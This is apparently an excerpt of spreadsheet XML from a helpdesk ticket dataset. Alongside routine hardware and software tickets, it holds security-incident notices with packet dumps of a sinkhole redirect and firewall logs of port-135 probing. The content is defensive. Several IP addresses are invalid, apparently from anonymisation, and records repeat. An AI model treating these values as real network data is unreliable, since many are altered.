    <s v="source ip : 61.01.52.02617_x000d__x000a_system name : lpawx210968sf_x000d__x000a_user  name: n/a_x000d__x000a_location : indaituba_x000d__x000a_sep , sms status : n/a_x000d__x000a_field sales user ( yes / no) :  no_x000d__x000a_dsw event log: see below_x000d__x000a__x000d__x000a_**_x000d__x000a__x000d__x000a_=========================_x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we are seeing your 10.32.100.17/isensor03.company.com device generating '51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset' alerts for traffic (not blocked) from port 80/tcp of 195.38.137.100 to port 3720/tcp of your lpawx210968sf/61.01.52.02617 device indicating that the host is most likely infected with malware. _x000d__x000a__x000d__x000a_this return traffic indicates that lpawx210968sf/61.01.52.02617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d__x000a__x000d__x000a_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1) ticket only escalation for sinkhole domain alerts (explicit notification via a medium priority ticket (no phone call))_x000d__x000a_2) auto-resolve sinkhole domain alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000d__x000a__x000d__x000a_sincerely,_x000d__x000a_secureworks soc_x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_technical details_x000d__x000a_=========================_x000d__x000a_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d__x000a__x000d__x000a_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d__x000a__x000d__x000a_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d__x000a__x000d__x000a_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quot;company x is infected with y&quot;, which may lead to reputational damage._x000d__x000a__x000d__x000a_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d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_references_x000d__x000a_=========================_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_____________________________________________________________________________x000d__x000a_event id: 303133902_x000d__x000a_event summary: 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset_x000d__x000a_log time: 2016-08-04 at 10:59:36_x000d__x000a_source ip: 195.38.137.100_x000d__x000a_destination ip: 61.01.52.02617_x000d__x000a_destination hostname: lpawx210968sf_x000d__x000a_device ip: 10.32.100.17_x000d__x000a_device name: isensor03.company.com_x000d__x000a_event extra data:_x000d__x000a_sherlockruleid = 699417_x000d__x000a_cvss = -1_x000d__x000a_ctainstanceid = 0_x000d__x000a_irreceivedtime = 1470308771682_x000d__x000a_httpstatuscode = 302_x000d__x000a_inspectoreventid = 028504841_x000d__x000a_eventtypepriority = 4_x000d__x000a_dstassetofinterest = 416_x000d__x000a_globalproxycorrelationurl = null_x000d__x000a_foreseeinternalip = 61.01.52.02617_x000d__x000a_logtimestamp = 2582520598_x000d__x000a_foreseeconndirection = incoming_x000d__x000a_foreseeexternalip = 195.38.137.100_x000d__x000a_inlineaction = 2_x000d__x000a_ontologyid = 200020003203753900_x000d__x000a_foreseesrcipgeo = franhtyufurt am main,deu_x000d__x000a_eventtypeid = 200020003203560456_x000d__x000a_dsthostname = lpawx210968sf_x000d__x000a_vendoreventid = 271147_x000d__x000a_vendorpriority = 2_x000d__x000a_tcpflags = ***ap***_x000d__x000a_proto = tcp_x000d__x000a_dstport = 3720_x000d__x000a_action = not blocked_x000d__x000a_ileatdatacenter = true_x000d__x000a_foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;ngm:0.1987:0.004;_x000d__x000a_httpcontenttype = text/html_x000d__x000a_vendorversion = 7_x000d__x000a_refererproxycorrelationurl = null_x000d__x000a_agentid = 102805_x000d__x000a_srcport = 80_x000d__x000a__x000d__x000a__x000d__x000a_occurrence count: 7_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_[**] [1:21162804:2] 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset [**]_x000d__x000a_[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000d__x000a_[sensor id: 602982][event id: 271147][time: 2582520598.52167]_x000d__x000a_[src ip: 195.38.137.100][dst ip: 61.01.52.02617][sport/itype: 80][dport/icode: 3720][proto: 6]_x000d__x000a_08/04/2016-10:59:36.052167 195.38.137.100:80 -&gt; 61.01.52.02617:3720_x000d__x000a_tcp ttl:45 tos:0x0 id:52866 iplen:20 dgmlen:386 df_x000d__x000a_***ap*** seq: 0xf1729be0  ack: 0xcc94106  win: 0x687f  tcplen: 20_x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /]_x000d__x000a__x000d__x000a_[ex http_hostname 10: futureinterest.org]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_.......w............e.....@.-..c.&amp;.d.,j..p...r....a.p.h.....http/1.1.302.moved.temporarily..server:.nginx..date:.thu,.04.aug.2016.10:59:36.gmt..content-type:.text/html..transfer-encoding:.chunked..connection:.close..location:.|12.161.199.50|2582520598|2582520598|0|1|0..set-cookie:.snkz=12.161.199.50....0...._x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000    0c00 0000 1820 a357 c7cb 0000 8201 0000    .......w........_x000d__x000a_000010    8201 0000 4500 0182 ce82 4000 2d06 dc63    ....e.....@.-..c_x000d__x000a_000020    c326 8964 0a2c 4ad9 0050 0e88 f172 9be0    .&amp;.d.,j..p...r.._x000d__x000a_000030    0cc9 4106 5018 687f e100 0000 4854 5450    ..a.p.h.....http_x000d__x000a_000040    2f31 2e31 2033 3032 204d 6f76 6564 2054    /1.1.302.moved.t_x000d__x000a_000050    656d 706f 7261 7269 6c79 0d0a 5365 7276    emporarily..serv_x000d__x000a_000060    6572 3a20 6e67 696e 780d 0a44 6174 653a    er:.nginx..date:_x000d__x000a_000070    2054 6875 2c20 3034 2041 7567 2032 3031    .thu,.04.aug.201_x000d__x000a_000080    3620 3130 3a35 393a 3336 2047 4d54 0d0a    6.10:59:36.gmt.._x000d__x000a_000090    436f 6e74 656e 742d 5479 7065 3a20 7465    content-type:.te_x000d__x000a_0000a0    7874 2f68 746d 6c0d 0a54 7261 6e73 6665    xt/html..transfe_x000d__x000a_0000b0    722d 456e 636f 6469 6e67 3a20 6368 756e    r-encoding:.chun_x000d__x000a_0000c0    6b65 640d 0a43 6f6e 6e65 6374 696f 6e3a    ked..connection:_x000d__x000a_0000d0    2063 6c6f 7365 0d0a 4c6f 6361 7469 6f6e    .close..location_x000d__x000a_0000e0    3a20 6874 7470 3a2f 2f73 736f 2e61 6e62    :._x000d__x000a_0000f0    7472 2e63 6f6d 2f64 6f6d 6169 6e2f 6675    tr.com/domain/fu_x000d__x000a_000100    7475 7265 696e 7465 7265 7374 2e6f 7267    tureinterest.org_x000d__x000a_000110    0d0a 5365 742d 436f 6f6b 6965 3a20 6274    ..set-cookie:.bt_x000d__x000a_000120    7374 3d66 6561 3834 3465 3066 3735 3966    st=fea844e0f759f_x000d__x000a_000130    6430 3931 3065 3566 3865 3463 6266 3665    d0910e5f8e4cbf6e_x000d__x000a_000140    6430 397c 3132 2e31 3631 2e31 3939 2e35    d09|12.161.199.5_x000d__x000a_000150    307c 3134 3730 3330 3833 3736 7c31 3437    0|2582520598|147_x000d__x000a_000160    3033 3038 3337 367c 307c 317c 300d 0a53    1419487|0|1|0..s_x000d__x000a_000170    6574 2d43 6f6f 6b69 653a 2073 6e6b 7a3d    et-cookie:.snkz=_x000d__x000a_000180    3132 2e31 3631 2e31 3939 2e35 300d 0a0d    12.161.199.50..._x000d__x000a_000190    0a30 0d0a 0d0a                             .0...._x000d__x000a_==pcap 1 hex e=="/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_1015: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%)."/>
    <s v="HostName_1015: average (4 samples) disk free on c:\ is now 15%, which is below the warning threshold (15%). out of total size 100.5 gb"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="as per inc1530161::security incidents - ( in33490582 ) : suspicious ms-rpc/ms-ds/netbios activity - HostName_17-new"/>
    <s v="_x000d__x000a_from: gzhapcld fdigznbk _x000d__x000a_sent: wednesday, august 10, 2016 12:28 am_x000d__x000a_to: bev loughner; ghiklyop nikszpeu; thoyhts brthyrtiv; tiyhum kuyiomar_x000d__x000a_cc: gdhyrts muggftyali ; qfrntose ivnhumzjalakrisyuhnyrtn; nyrjkctu tbhkenlo; ugyothfz ugrmkdhx; kathght shfhyw; suhtnhdyio psfshytd; bhayhtrathramdnty mamilujli_x000d__x000a_subject: inc1530161::security incidents - ( in33490582 ) : suspicious ms-rpc/ms-ds/netbios activity - HostName_17-new_x000d__x000a__x000d__x000a_hello amerirtcas pc support,_x000d__x000a__x000d__x000a_we have detected at least 226 occurrences of your firewall att-singapore-asa.company.com-1/54.96.80.216 dropping traffic sourcing from HostName_17-new/29.26.13.3095 and destined to port 135 of one or more destination devices. this activity may indicate one of the following:_x000d__x000a_1. an infection on this host_x000d__x000a_2. a misconfigured firewall_x000d__x000a_3. a misconfigured host_x000d__x000a_4. port scan (authorized or unauthorized)_x000d__x000a__x000d__x000a_we have created a ticketing_tool ticket and assigned it to amerirtcas pc services. inc1530161_x000d__x000a_=========================_x000d__x000a_technical details_x000d__x000a_=========================_x000d__x000a_historically, there have been various worms/malware that have used ports 135, 137, 138, 139, and 445 to propagate. examples include:_x000d__x000a_-w32.blaster.worm/msblast/lovsan _x000d__x000a_-w32.welchia/nachi_x000d__x000a_-w32.reatle_x000d__x000a__x000d__x000a_port 135 - microsoft epmap (end point mapper), also known as dce/rpc locator service_x000d__x000a__x000d__x000a_port 137 - netbios netbios name service_x000d__x000a__x000d__x000a_port 138 - netbios netbios datagramdnty service_x000d__x000a__x000d__x000a_port 139 - netbios netbios session service_x000d__x000a__x000d__x000a_port 445 - microsoft-ds smb file sharing_x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_____________________________________________________________________________x000d__x000a_event id: 80975479_x000d__x000a_event summary: internal outbreak for 135/tcp_x000d__x000a_log time: 2016-08-03 at 17:48:46_x000d__x000a_source ip: 29.26.13.3095_x000d__x000a_source hostname: HostName_17-new_x000d__x000a_destination hostname: lmxl9516628_x000d__x000a_device ip: 54.96.80.216_x000d__x000a_device name: att-singapore-asa.company.com-1_x000d__x000a_event extra data:_x000d__x000a_inspectorruleid = 186739_x000d__x000a_sherlockruleid = 537074_x000d__x000a_cvss = -1_x000d__x000a_ontologyid = 200020003203009162_x000d__x000a_srchostname = HostName_17-new_x000d__x000a_eventtypeid = 200020003203009062_x000d__x000a_dsthostname = lmxl9516628_x000d__x000a_ctainstanceid = 0_x000d__x000a_irreceivedtime = 1470247430401_x000d__x000a_inspectoreventid = 874753956_x000d__x000a_proto = tcp_x000d__x000a_eventtypepriority = 1_x000d__x000a_dstport = 135_x000d__x000a_action = blocked_x000d__x000a_ileatdatacenter = true_x000d__x000a_foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;ngm:0.8019:0.0022;_x000d__x000a_foreseeinternalip = 29.26.13.3095_x000d__x000a_logtimestamp = 2581357637_x000d__x000a_agentid = 103955_x000d__x000a_foreseeconndirection = internal_x000d__x000a_srcassetofinterest = 264_x000d__x000a_srcport = 56840_x000d__x000a__x000d__x000a__x000d__x000a_occurrence count: 226_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_aug 3 17:48:46 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56840 dst outside:192.168.0.5/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:48:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56870 dst outside:192.168.254.16/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:48:58 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56885 dst outside:192.168.86.169/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:00 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56899 dst outside:192.168.1.70/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:03 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56924 dst outside:192.168.6.154/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:09 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56952 dst outside:192.168.54.65/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:18 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56970 dst outside:192.168.68.106/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:21 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56980 dst outside:192.168.43.240/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:29 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57000 dst outside:192.168.254.28/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57017 dst outside:192.168.1.37/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:32 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57019 dst outside:192.168.0.11/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57033 dst outside:192.168.1.105/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57035 dst outside:192.168.0.20/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57061 dst outside:192.168.1.11/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57075 dst outside:192.168.1.71/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:59 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57118 dst outside:192.168.1.139/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="client is unable to view 2 screens when tablet is docked"/>
    <s v="client is unable to view 2 screens when tablet is docked"/>
    <s v="tskwevno sjhpoakl"/>
    <x v="2"/>
  </r>
  <r>
    <s v="clients pc is making buzzing noise and wont turn on"/>
    <s v="clients pc is making buzzing noise and wont turn on"/>
    <s v="sigfdwcj reofwzlm"/>
    <x v="2"/>
  </r>
  <r>
    <s v="activation not valid for microsoft projects"/>
    <s v="activation not valid for microsoft projects"/>
    <s v="zhvrtnom waedkqzj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="security incidents - ( dsw #in33407676 ) : traffic from sinkhole domain to ( lpawx210968sf / 61.01.52.02617 )"/>
    <s v="source ip : 61.01.52.02617_x000d__x000a_system name : lpawx210968sf_x000d__x000a_user  name: n/a_x000d__x000a_location : indaituba_x000d__x000a_sep , sms status : n/a_x000d__x000a_field sales user ( yes / no) :  no_x000d__x000a_dsw event log: see below_x000d__x000a__x000d__x000a_**_x000d__x000a__x000d__x000a_=========================_x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we are seeing your 10.32.100.17/isensor03.company.com device generating '51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset' alerts for traffic (not blocked) from port 80/tcp of 195.38.137.100 to port 3720/tcp of your lpawx210968sf/61.01.52.02617 device indicating that the host is most likely infected with malware. _x000d__x000a__x000d__x000a_this return traffic indicates that lpawx210968sf/61.01.52.02617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d__x000a__x000d__x000a_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_x000a_1) ticket only escalation for sinkhole domain alerts (explicit notification via a medium priority ticket (no phone call))_x000d__x000a_2) auto-resolve sinkhole domain alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000d__x000a__x000d__x000a_sincerely,_x000d__x000a_secureworks soc_x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_technical details_x000d__x000a_=========================_x000d__x000a_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d__x000a__x000d__x000a_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d__x000a__x000d__x000a_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d__x000a__x000d__x000a_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quot;company x is infected with y&quot;, which may lead to reputational damage._x000d__x000a__x000d__x000a_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d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_references_x000d__x000a_=========================_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_____________________________________________________________________________x000d__x000a_event id: 303133902_x000d__x000a_event summary: 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset_x000d__x000a_log time: 2016-08-04 at 10:59:36_x000d__x000a_source ip: 195.38.137.100_x000d__x000a_destination ip: 61.01.52.02617_x000d__x000a_destination hostname: lpawx210968sf_x000d__x000a_device ip: 10.32.100.17_x000d__x000a_device name: isensor03.company.com_x000d__x000a_event extra data:_x000d__x000a_sherlockruleid = 699417_x000d__x000a_cvss = -1_x000d__x000a_ctainstanceid = 0_x000d__x000a_irreceivedtime = 1470308771682_x000d__x000a_httpstatuscode = 302_x000d__x000a_inspectoreventid = 028504841_x000d__x000a_eventtypepriority = 4_x000d__x000a_dstassetofinterest = 416_x000d__x000a_globalproxycorrelationurl = null_x000d__x000a_foreseeinternalip = 61.01.52.02617_x000d__x000a_logtimestamp = 2582520598_x000d__x000a_foreseeconndirection = incoming_x000d__x000a_foreseeexternalip = 195.38.137.100_x000d__x000a_inlineaction = 2_x000d__x000a_ontologyid = 200020003203753900_x000d__x000a_foreseesrcipgeo = franhtyufurt am main,deu_x000d__x000a_eventtypeid = 200020003203560456_x000d__x000a_dsthostname = lpawx210968sf_x000d__x000a_vendoreventid = 271147_x000d__x000a_vendorpriority = 2_x000d__x000a_tcpflags = ***ap***_x000d__x000a_proto = tcp_x000d__x000a_dstport = 3720_x000d__x000a_action = not blocked_x000d__x000a_ileatdatacenter = true_x000d__x000a_foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;ngm:0.1987:0.004;_x000d__x000a_httpcontenttype = text/html_x000d__x000a_vendorversion = 7_x000d__x000a_refererproxycorrelationurl = null_x000d__x000a_agentid = 102805_x000d__x000a_srcport = 80_x000d__x000a__x000d__x000a__x000d__x000a_occurrence count: 7_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_[**] [1:21162804:2] 51793 vid36000 server response with anubis sinkhole cookies set - probable infected asset [**]_x000d__x000a_[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000d__x000a_[sensor id: 602982][event id: 271147][time: 2582520598.52167]_x000d__x000a_[src ip: 195.38.137.100][dst ip: 61.01.52.02617][sport/itype: 80][dport/icode: 3720][proto: 6]_x000d__x000a_08/04/2016-10:59:36.052167 195.38.137.100:80 -&gt; 61.01.52.02617:3720_x000d__x000a_tcp ttl:45 tos:0x0 id:52866 iplen:20 dgmlen:386 df_x000d__x000a_***ap*** seq: 0xf1729be0  ack: 0xcc94106  win: 0x687f  tcplen: 20_x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /]_x000d__x000a__x000d__x000a_[ex http_hostname 10: futureinterest.org]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_.......w............e.....@.-..c.&amp;.d.,j..p...r....a.p.h.....http/1.1.302.moved.temporarily..server:.nginx..date:.thu,.04.aug.2016.10:59:36.gmt..content-type:.text/html..transfer-encoding:.chunked..connection:.close..location:.|12.161.199.50|2582520598|2582520598|0|1|0..set-cookie:.snkz=12.161.199.50....0...._x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000    0c00 0000 1820 a357 c7cb 0000 8201 0000    .......w........_x000d__x000a_000010    8201 0000 4500 0182 ce82 4000 2d06 dc63    ....e.....@.-..c_x000d__x000a_000020    c326 8964 0a2c 4ad9 0050 0e88 f172 9be0    .&amp;.d.,j..p...r.._x000d__x000a_000030    0cc9 4106 5018 687f e100 0000 4854 5450    ..a.p.h.....http_x000d__x000a_000040    2f31 2e31 2033 3032 204d 6f76 6564 2054    /1.1.302.moved.t_x000d__x000a_000050    656d 706f 7261 7269 6c79 0d0a 5365 7276    emporarily..serv_x000d__x000a_000060    6572 3a20 6e67 696e 780d 0a44 6174 653a    er:.nginx..date:_x000d__x000a_000070    2054 6875 2c20 3034 2041 7567 2032 3031    .thu,.04.aug.201_x000d__x000a_000080    3620 3130 3a35 393a 3336 2047 4d54 0d0a    6.10:59:36.gmt.._x000d__x000a_000090    436f 6e74 656e 742d 5479 7065 3a20 7465    content-type:.te_x000d__x000a_0000a0    7874 2f68 746d 6c0d 0a54 7261 6e73 6665    xt/html..transfe_x000d__x000a_0000b0    722d 456e 636f 6469 6e67 3a20 6368 756e    r-encoding:.chun_x000d__x000a_0000c0    6b65 640d 0a43 6f6e 6e65 6374 696f 6e3a    ked..connection:_x000d__x000a_0000d0    2063 6c6f 7365 0d0a 4c6f 6361 7469 6f6e    .close..location_x000d__x000a_0000e0    3a20 6874 7470 3a2f 2f73 736f 2e61 6e62    :._x000d__x000a_0000f0    7472 2e63 6f6d 2f64 6f6d 6169 6e2f 6675    tr.com/domain/fu_x000d__x000a_000100    7475 7265 696e 7465 7265 7374 2e6f 7267    tureinterest.org_x000d__x000a_000110    0d0a 5365 742d 436f 6f6b 6965 3a20 6274    ..set-cookie:.bt_x000d__x000a_000120    7374 3d66 6561 3834 3465 3066 3735 3966    st=fea844e0f759f_x000d__x000a_000130    6430 3931 3065 3566 3865 3463 6266 3665    d0910e5f8e4cbf6e_x000d__x000a_000140    6430 397c 3132 2e31 3631 2e31 3939 2e35    d09|12.161.199.5_x000d__x000a_000150    307c 3134 3730 3330 3833 3736 7c31 3437    0|2582520598|147_x000d__x000a_000160    3033 3038 3337 367c 307c 317c 300d 0a53    1419487|0|1|0..s_x000d__x000a_000170    6574 2d43 6f6f 6b69 653a 2073 6e6b 7a3d    et-cookie:.snkz=_x000d__x000a_000180    3132 2e31 3631 2e31 3939 2e35 300d 0a0d    12.161.199.50..._x000d__x000a_000190    0a30 0d0a 0d0a                             .0...._x000d__x000a_==pcap 1 hex e=="/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="62"/>
  </r>
  <r>
    <s v="security incidents - ( in33490582 ) : suspicious ms-rpc/ms-ds/netbios activity - HostName_17-new"/>
    <s v="source ip : 29.26.13.3095_x000d__x000a_system name :HostName_17-new_x000d__x000a_destination hostname: lmxl9516628_x000d__x000a_device ip: 54.96.80.216_x000d__x000a_username: ztnfhiwq njpwxmdi ibaÃ±ez_x000d__x000a_location : mexico_x000d__x000a_sep , sms status :no updates_x000d__x000a_field sales user ( yes / no) :  no _x000d__x000a_dsw event log:see below_x000d__x000a_--------------------------------------------------------------------_x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_____________________________________________________________________________x000d__x000a_event id: 80975479_x000d__x000a_event summary: internal outbreak for 135/tcp_x000d__x000a_log time: 2016-08-03 at 17:48:46_x000d__x000a_source ip: 29.26.13.3095_x000d__x000a_source hostname: HostName_17-new_x000d__x000a_destination hostname: lmxl9516628_x000d__x000a_device ip: 54.96.80.216_x000d__x000a_device name: att-singapore-asa.company.com-1_x000d__x000a_event extra data:_x000d__x000a_inspectorruleid = 186739_x000d__x000a_sherlockruleid = 537074_x000d__x000a_cvss = -1_x000d__x000a_ontologyid = 200020003203009162_x000d__x000a_srchostname = HostName_17-new_x000d__x000a_eventtypeid = 200020003203009062_x000d__x000a_dsthostname = lmxl9516628_x000d__x000a_ctainstanceid = 0_x000d__x000a_irreceivedtime = 1470247430401_x000d__x000a_inspectoreventid = 874753956_x000d__x000a_proto = tcp_x000d__x000a_eventtypepriority = 1_x000d__x000a_dstport = 135_x000d__x000a_action = blocked_x000d__x000a_ileatdatacenter = true_x000d__x000a_foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;ngm:0.8019:0.0022;_x000d__x000a_foreseeinternalip = 29.26.13.3095_x000d__x000a_logtimestamp = 2581357637_x000d__x000a_agentid = 103955_x000d__x000a_foreseeconndirection = internal_x000d__x000a_srcassetofinterest = 264_x000d__x000a_srcport = 56840_x000d__x000a__x000d__x000a__x000d__x000a_occurrence count: 226_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_aug 3 17:48:46 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56840 dst outside:192.168.0.5/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:48:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56870 dst outside:192.168.254.16/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:48:58 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56885 dst outside:192.168.86.169/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:00 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56899 dst outside:192.168.1.70/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:03 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56924 dst outside:192.168.6.154/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:09 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56952 dst outside:192.168.54.65/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:18 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56970 dst outside:192.168.68.106/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:21 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56980 dst outside:192.168.43.240/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:29 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57000 dst outside:192.168.254.28/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:31 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57017 dst outside:192.168.1.37/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:32 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57019 dst outside:192.168.0.11/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57033 dst outside:192.168.1.105/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:34 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57035 dst outside:192.168.0.20/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:51 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57061 dst outside:192.168.1.11/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:54 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57075 dst outside:192.168.1.71/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:59 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57118 dst outside:192.168.1.139/135 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_____________________________________________________________________________x000d__x000a_event id: 80975470_x000d__x000a_event summary: internal outbreak for 445/tcp_x000d__x000a_log time: 2016-08-03 at 17:48:46_x000d__x000a_source ip: 29.26.13.3095_x000d__x000a_source hostname: HostName_17-new_x000d__x000a_destination hostname: lmxl9516628_x000d__x000a_device ip: 54.96.80.216_x000d__x000a_device name: att-singapore-asa.company.com-1_x000d__x000a_event extra data:_x000d__x000a_inspectorruleid = 186739_x000d__x000a_sherlockruleid = 537074_x000d__x000a_cvss = -1_x000d__x000a_ontologyid = 200020003203009162_x000d__x000a_srchostname = HostName_17-new_x000d__x000a_eventtypeid = 200020003203009062_x000d__x000a_dsthostname = lmxl9516628_x000d__x000a_ctainstanceid = 0_x000d__x000a_irreceivedtime = 1470247430401_x000d__x000a_inspectoreventid = 874753956_x000d__x000a_proto = tcp_x000d__x000a_eventtypepriority = 1_x000d__x000a_dstport = 135_x000d__x000a_action = blocked_x000d__x000a_ileatdatacenter = true_x000d__x000a_foreseemaliciouscomment = null or empty model found;evaluationmodels-&gt;ngm:0.8019:0.0022;_x000d__x000a_foreseeinternalip = 29.26.13.3095_x000d__x000a_logtimestamp = 2581357637_x000d__x000a_agentid = 